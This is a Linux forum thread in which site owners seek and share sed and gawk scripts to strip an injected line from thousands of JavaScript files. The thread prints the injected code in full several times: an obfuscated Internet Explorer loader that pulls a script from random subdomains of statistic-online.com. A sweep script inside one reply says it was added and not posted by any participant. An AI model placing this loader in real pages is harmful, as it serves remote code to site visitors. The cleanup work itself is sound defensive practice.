LinuxQuestions.org
Old 04-17-2013, 12:19 PM   #1
sinjed
LQ Newbie
 
Registered: Apr 2013
Posts: 2

Rep: Reputation: Disabled
Script to remove character and malicious line from any file.


We're getting some malicious code injected into our .js files, which we have a couple thousand of on various sites. Anyone know how to remove the added character and line below? Something like sed -i '/statistic-online/d' but for all files? Not sure about the added ";" though.

Before:

});

After:

});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}
 
Old 04-17-2013, 12:33 PM   #2
Zzipo
LQ Newbie
 
Registered: Mar 2013
Posts: 28

Rep: Reputation: Disabled
I don't really catch what you need, but...

As I understand it, you want to remove the next two lines. I don't know if it is always going to be like that, or if there could be new spaces, tabs, ... between some characters.

Because if it is just the same two lines, you can use a regexp to destroy it.

Like:

Legit code
Code:
blablablabla1
});
blablablabla2
Unlegit code
Code:
blablabla1
});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}
blablabla2

First, if YOU ARE SURE that it is always added like that, with one more ";" and then all of that on the same line, you can just search for "});;" and delete the next line.

But you must be sure, because if you program like ";;" sometimes, you will destroy the next legit line.

If you want to be sure that you only destroy the "injected code", you need to use a regexp and write such things in the line.
The more complex the regexp is, the better the results are.

For example: if you take care in the regexp to detect:
Code:
...//'+Math.floor....
...//' +Math.floor....
...//' + Math.floor....
...//'+Math.floor....
...//'           +        Math.floor....
...//'
+Math.floor....
...//'
+
Math.floor....
etc

Your regexp will be more complicated, but it will give better results.
 
Old 04-17-2013, 12:42 PM   #3
sinjed
LQ Newbie
 
Registered: Apr 2013
Posts: 2

Original Poster
Rep: Reputation: Disabled
From what we've seen, the line is the exact same in every file. And what we're trying to do is just revert the code to the original state.

From malicious code:

});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}


To original state:

});
 
Old 04-17-2013, 01:50 PM   #4
Zzipo
LQ Newbie
 
Registered: Mar 2013
Posts: 28

Rep: Reputation: Disabled
Uff... I have spent about one hour learning how to do it.

But, well, finally here it is.

test2.txt
Code:
});;

});

});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}


});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}


});;
war, peace, medieval times, spanish inquisition, durruti

});


});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}


});;
if	( navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}



});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}

something more

script:

Code:
sed '${;q};N;/);;\n/{s/;\nif[[:blank:]]*([[:blank:]]*navigator\.appName==\"Microsoft Internet Explorer\")[[:blank:]]*{document.write('\''<scr'\''+'\''ipt language=\"JavaScript\" src=\"http:\/\/'\''+Math\.floor(Math\.random()\*999999)+'\''\.statistic-online\.com\/stat_engine\.js?v1\"><\/scr'\''+'\''ipt>'\'');}//;b};P;D' <test2.txt >test2_mod.txt

**Remember to add the [[:blank:]] part in the places where you think they can add blanks/tabs, and it will still work. I have done it in the first parts, but you will know better what JS supports.

It works really well.

Results:
Code:
});;

});

});


});


});;
war, peace, medieval times, spanish inquisition, durruti

});


});


});



});

something more

Enough help for this week xD

Last edited by Zzipo; 04-17-2013 at 01:54 PM.
 
1 members found this post helpful.
Old 04-17-2013, 02:06 PM   #5
Beryllos
Member
 
Registered: Apr 2013
Location: Massachusetts
Distribution: Debian
Posts: 349

Rep: Reputation: 151
How is that code getting "injected" in there? Part of your solution has to include stopping that, right?
 
Old 04-17-2013, 02:12 PM   #6
Zzipo
LQ Newbie
 
Registered: Mar 2013
Posts: 28

Rep: Reputation: Disabled
Quote:
Originally Posted by Beryllos View Post
How is that code getting "injected" in there? Part of your solution has to include stopping that, right?
Hahaha, I hope he/she will do it.

This is just "covering" the problem.
 
Old 04-17-2013, 02:20 PM   #7
Habitual
LQ Addict
 
Registered: Jan 2011
Posts: 8,347
Blog Entries: 11

Rep: Reputation: 2320
http://25yearsofprogramming.com/blog/20071223.htm
 
Old 04-17-2013, 05:56 PM   #8
PTrenholme
Senior Member
 
Registered: Dec 2004
Location: Olympia, WA, USA
Distribution: Fedora, (K)Ubuntu
Posts: 4,186

Rep: Reputation: 346
This awk program
Code:
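#!/bin/gawk -f
# A line ending in ";;" may be followed by the injected line.
/;;$/{
  line=$0
  # At end of file there is no next line: print the held line once and stop.
  if ((getline) <= 0) {
    print line
    next
  }
  if ($0 !~ /navigator\.appName==/) {
    # Not the injected line: keep the held line unchanged, then fall
    # through so the default rule below prints the current line.
    print line
  }
  else {
    # Injected line found: turn ";;" back into ";" and drop the injected line.
    sub(/;;$/,";",line)
    print line
    next
  }
}
{print}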

produces, using the test file posted by Zzipo, above:
Code:
$ ./remove_bad_code.awk bad_code.txt 
});;

});

});


});


});;
war, peace, medieval times, spanish inquisition, durruti

});


});


});



});

something more

Note that the program keys on "navigator.appName" rather than the full line. That could introduce errors, but it was easier to type.

Last edited by PTrenholme; 04-17-2013 at 06:00 PM. Reason: Simplified code
 
Old 04-17-2013, 07:10 PM   #9
chrism01
LQ Guru
 
Registered: Aug 2004
Location: Sydney
Distribution: Centos 6.9, Centos 7.3
Posts: 17,362

Rep: Reputation: 2377
Code:
# use this to check a few files
sed '/});;$/N;s/});;\n.*Micro.*/});/' filename

# if ok, add in-place edit switch OR see next
sed -i '/});;$/N;s/});;\n.*Micro.*/});/' filename

# in-place edit + backup
sed -i.bak '/});;$/N;s/});;\n.*Micro.*/});/' filename
Works on my test file; code adapted from http://www.shell-fu.org/lister.php?id=539
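
The commands in this thread act on one file at a time, while the original question was about a couple of thousand .js files. The script below is an added example, not code posted by any participant: it applies chrism01's sed expression across a tree, keeps a backup of each rewritten file, and reports how many files still carry the injected domain afterwards. Assumptions: GNU find, grep and sed; the function names and the sample tree are constructed for illustration; the expression keys on the domain string from the injected line instead of `.*Micro.*`.

```shell
#!/bin/sh
# Added example (not from the thread): sweep a tree of .js files, revert the
# injected loader, and report what still carries the marker afterwards.
MARKER='statistic-online.com/stat_engine.js'   # string from the injected line
# chrism01's sed expression, keyed on the marker instead of ".*Micro.*"
FIX='/});;$/N;s/});;\n.*statistic-online\.com\/stat_engine\.js.*/});/'

# List every .js file under $1 that contains the marker (fixed-string match).
list_infected() {
    find "$1" -type f -name '*.js' -exec grep -lF -- "$MARKER" {} +
}

# Rewrite only files that contain the marker, keeping FILE.bak for review,
# then print how many files still contain it (0 means the sweep was complete).
clean_tree() {
    find "$1" -type f -name '*.js' \
        -exec grep -qF -- "$MARKER" {} \; \
        -exec sed -i.bak "$FIX" {} \;
    list_infected "$1" | wc -l
}

# Constructed sample tree: an infected file that also has a legitimate "});;",
# a clean file, and a variant ("});; " with a trailing blank) that the
# exact-match expression will not touch.
make_sample() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/site a/js"
    bad="if(navigator.appName==\"Microsoft Internet Explorer\"){document.write('<scr'+'ipt language=\"JavaScript\" src=\"http://'+Math.floor(Math.random()*999999)+'.$MARKER?v1\"></scr'+'ipt>');}"
    printf 'a(function(){\n});;\nh();\nf(function(){\n});;\n%s\n' "$bad" \
        > "$d/site a/js/infected.js"
    printf 'g(function(){\n});\n' > "$d/clean.js"
    printf 'f(function(){\n});; \n%s\n' "$bad" > "$d/variant.js"
    printf '%s\n' "$d"
}

# Usage: sh sweep.sh /path/to/webroot
if [ $# -gt 0 ]; then
    list_infected "$1"
    echo "files still carrying the marker after cleanup: $(clean_tree "$1")"
fi
```

Compare each FILE.bak with its rewritten file using diff before deleting the backups. A non-zero count means some files carry a variant of the injection that the exact-match expression left alone, and those need manual review.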
 
Old 04-18-2013, 09:23 AM   #10
Habitual
LQ Addict
 
Registered: Jan 2011
Posts: 8,347
Blog Entries: 11

Rep: Reputation: 2320
Quote:
Originally Posted by chrism01 View Post
Code:
# use this to check a few files
sed '/});;$/N;s/});;\n.*Micro.*/});/' filename

# if ok, add in-place edit switch OR see next
sed -i '/});;$/N;s/});;\n.*Micro.*/});/' filename

# in-place edit + backup
sed -i.bak '/});;$/N;s/});;\n.*Micro.*/});/' filename
Works on my test file; code adapted from http://www.shell-fu.org/lister.php?id=539
You rock the sed.fu
 
Old 04-18-2013, 07:51 PM   #11
chrism01
LQ Guru
 
Registered: Aug 2004
Location: Sydney
Distribution: Centos 6.9, Centos 7.3
Posts: 17,362

Rep: Reputation: 2377
Thanks, but plaudits for the advanced stuff go to that guy in the link; my actual sed fu is pretty basic.
I'm not too bad at adapting stuff though
 
  


All times are GMT -5.